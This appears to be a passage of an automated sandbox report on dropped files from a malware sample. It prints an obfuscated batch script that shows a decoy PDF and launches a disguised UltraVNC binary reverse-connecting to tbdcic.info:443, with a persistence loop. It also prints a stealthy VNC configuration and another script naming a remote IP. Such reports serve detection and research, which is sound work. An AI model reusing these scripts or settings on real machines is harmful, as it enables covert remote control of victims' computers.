                                                    Preview:@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).
                                                    Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                    File Type:PDF document, version 1.5 (zip deflate encoded)
                                                    Category:dropped
                                                    Size (bytes):605114
                                                    Entropy (8bit):7.931189302613814
                                                    Encrypted:false
                                                    SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                    MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                    SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                    SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                    SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                    Malicious:false
                                                    Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                    Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:modified
                                                    Size (bytes):1945368
                                                    Entropy (8bit):6.532894678367002
                                                    Encrypted:false
                                                    SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                    MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                    SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                    SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                    SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                    File Type:Generic INItialization configuration [admin]
                                                    Category:dropped
                                                    Size (bytes):858
                                                    Entropy (8bit):5.233343202654504
                                                    Encrypted:false
                                                    SSDEEP:24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
                                                    MD5:C55EEA597023B8C774986495ECAE5B33
                                                    SHA1:279315CE36021D2C86AE97EBFAA528749FA89544
                                                    SHA-256:75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
                                                    SHA-512:D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
                                                    Malicious:false
                                                    Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..
                                                    Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):867840
                                                    Entropy (8bit):6.386550733462827
                                                    Encrypted:false
                                                    SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                    MD5:0F568F6C821565AB9FF45C7457953789
                                                    SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                    SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                    SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):3.5160983163107673
                                                    Encrypted:false
                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkTH:Qw946cPbiOxDlbYnuRKDlDTH
                                                    MD5:803AA3006BE1A79C63F9BBDF89CD9A77
                                                    SHA1:F3035C65099CB0C8CF870E8F696972A5CAD1D559
                                                    SHA-256:FD07FFFD1A2C8EF56B2D7E8317519F07E8B2E138F636CFB06EFF226E4E7D685E
                                                    SHA-512:89DB3C0055EAF6BBF8195AA093F77BC52AE252B9451929FDFE7597ED20C6DB525A81D72A62C9F62505FB0B60DA5482779FD1A949EFB60D04CACE7ADFA352337C
                                                    Malicious:false
                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.2.9.:.2.5. .=.=.=.....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393)
                                                    Category:dropped
                                                    Size (bytes):16525
                                                    Entropy (8bit):5.386483451061953
                                                    Encrypted:false
                                                    SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                    MD5:F49CA270724D610D1589E217EA78D6D1
                                                    SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                    SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                    SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                    Malicious:false
                                                    Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):15114
                                                    Entropy (8bit):5.3739518933239605
                                                    Encrypted:false
                                                    SSDEEP:384:O8OlGorfkTyXYfNqQmciNfbuCZ8LOiWj/cs6wc6EYESfFKVMEb/PyVyXaH5Y69FF:qny9u
                                                    MD5:47066623FA015C885EAF92F4FA554B6E
                                                    SHA1:A0DC1FDECDCBD23F3EFD94E4F7F0D6726D5AD7DF
                                                    SHA-256:9843F3BB96A6A8B3EBC00FF35017EE87BF7F4C2E0EF9BB05D64682DA677AD308
                                                    SHA-512:CC97613EB2384434DFC6AB2B908DDE814010F5BEA3617C361F8D20AC65B036569FFA41FC7E57B5C4CE855289301472644DE78B09E2EB68A19074365B60A20322
                                                    Malicious:false
                                                    Preview:SessionID=5cf16b48-9d53-442a-8747-e27836d5d128.1734956959205 Timestamp=2024-12-23T07:29:19:205-0500 ThreadID=8044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=5cf16b48-9d53-442a-8747-e27836d5d128.1734956959205 Timestamp=2024-12-23T07:29:19:220-0500 ThreadID=8044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=5cf16b48-9d53-442a-8747-e27836d5d128.1734956959205 Timestamp=2024-12-23T07:29:19:220-0500 ThreadID=8044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=5cf16b48-9d53-442a-8747-e27836d5d128.1734956959205 Timestamp=2024-12-23T07:29:19:220-0500 ThreadID=8044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=5cf16b48-9d53-442a-8747-e27836d5d128.1734956959205 Timestamp=2024-12-23T07:29:19:220-0500 ThreadID=8044 Component=ngl-lib_NglAppLib Description="SetConf
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):35721
                                                    Entropy (8bit):5.4143366959605475
                                                    Encrypted:false
                                                    SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRXearKE733iFdpnK:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRh
                                                    MD5:BEC718BA80295C99E66EF6A9F961AD22
                                                    SHA1:7EB0FBFEA1F83F8F05A2DAC2A41C5904763A811D
                                                    SHA-256:0EA27649CBCA9B75E70C6A87E8498E310A79F6F14E8F5C48EC1CE5FA8D269F59
                                                    SHA-512:5D246C0489EB16802D3717F8399552A0C31BA29AF4827153F579B47468FF586784495FB519C71224E11BF4D44D038E0B4D8C0686F3F8B0245CFEA379EB8E5A87
                                                    Malicious:false
                                                    Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                    Category:dropped
                                                    Size (bytes):758601
                                                    Entropy (8bit):7.98639316555857
                                                    Encrypted:false
                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                    MD5:3A49135134665364308390AC398006F1
                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                    Malicious:false
                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                    Category:dropped
                                                    Size (bytes):1419751
                                                    Entropy (8bit):7.976496077007677
                                                    Encrypted:false
                                                    SSDEEP:24576:/bwYIGNP49WL07oDGZfNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:DwZG69WLxDGZN3mlind9i4ufFXpAXkru
                                                    MD5:03BFEC80D6B1DF14D793604D4F394149
                                                    SHA1:BEBD26512F1FECAF94443E3DDEABC77D7DD45066
                                                    SHA-256:4C74AAEFB0EA762202A9B66DE10C3407BCF978344115C8101F11A61638E97952
                                                    SHA-512:EF3A77DAC9F2DDE1277D607D65C856D204D78513F26C21253B4B76CB3D4D3201E6B9BA8AF7CE890C2DD4595A7D26ED96624181182724DC830BEDF85334838740
                                                    Malicious:false
                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                    Category:dropped
                                                    Size (bytes):386528
                                                    Entropy (8bit):7.9736851559892425
                                                    Encrypted:false
                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                    Malicious:false
                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                    Category:dropped
                                                    Size (bytes):1407294
                                                    Entropy (8bit):7.97605879016224
                                                    Encrypted:false
                                                    SSDEEP:24576:/xXkwYIGNPldpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:J0wZGP3mlind9i4ufFXpAXkrfUs0qWLk
                                                    MD5:D35ABC179F98F8D15ECBBD1A7BF27B5A
                                                    SHA1:2467D0FC2DD605B46D6EB9FC0219D1E28B311590
                                                    SHA-256:E6EA0608B943D686875D3088D1DF899F75C8B65612154EE82CE60390669F5C66
                                                    SHA-512:203BC7CD461AB754C5C7E1C534E1582EADCF4CC4549AA706CCD5E99F4768D131C503E63796073A6B95E32D7F6F7D661C7DD33A75EDBB3E825B2EBA30F4D993FC
                                                    Malicious:false
                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PDF document, version 1.5 (zip deflate encoded)
                                                    Category:dropped
                                                    Size (bytes):605114
                                                    Entropy (8bit):7.931189302613814
                                                    Encrypted:false
                                                    SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                    MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                    SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                    SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                    SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                    Malicious:false
                                                    Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:DOS batch file, ASCII text
                                                    Category:dropped
                                                    Size (bytes):503
                                                    Entropy (8bit):5.353292454999417
                                                    Encrypted:false
                                                    SSDEEP:12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
                                                    MD5:41F0189B83E9D493B86D7182B3514F9D
                                                    SHA1:D4EC6020DE07E7D10552189CE4025B220467A522
                                                    SHA-256:7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
                                                    SHA-512:AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
                                                    Malicious:false
                                                    Preview:@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:DOS batch file, ASCII text
                                                    Category:dropped
                                                    Size (bytes):503
                                                    Entropy (8bit):5.353292454999417
                                                    Encrypted:false
                                                    SSDEEP:12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
                                                    MD5:41F0189B83E9D493B86D7182B3514F9D
                                                    SHA1:D4EC6020DE07E7D10552189CE4025B220467A522
                                                    SHA-256:7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
                                                    SHA-512:AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
                                                    Malicious:false
